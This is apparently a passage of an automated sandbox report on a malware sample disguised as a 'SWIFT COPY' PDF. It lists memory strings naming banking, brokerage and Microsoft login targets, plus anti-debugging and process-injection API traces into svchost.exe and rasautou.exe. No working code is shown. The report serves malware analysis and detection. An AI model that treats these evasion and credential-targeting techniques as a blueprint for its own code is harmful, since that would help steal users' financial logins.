                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2
                Source: 3q3Zl7JL.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,116
                Source: 3q3Zl7JL.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 3q3Zl7JL.4.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612180674.0000000001109000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3q3Zl7JL.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: firefox.exe, 00000009.00000002.2621176407.00000252644FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: 3q3Zl7JL.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 3q3Zl7JL.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 3q3Zl7JL.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 3q3Zl7JL.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 3q3Zl7JL.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 3q3Zl7JL.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware
                Source: 3q3Zl7JL.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696487552h
                Source: 3q3Zl7JL.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 3q3Zl7JL.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 3q3Zl7JL.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-93998
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-95218
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E23 LdrLoadDll,2_2_00417E23
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00976AAF BlockInput,0_2_00976AAF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00923D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00923D19
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00953920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00953920
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093E01E LoadLibraryA,GetProcAddress,0_2_0093E01E
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_01028388 mov eax, dword ptr fs:[00000030h]0_2_01028388
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_010283E8 mov eax, dword ptr fs:[00000030h]0_2_010283E8
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_01026D58 mov eax, dword ptr fs:[00000030h]0_2_01026D58
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h]2_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h]2_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h]2_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
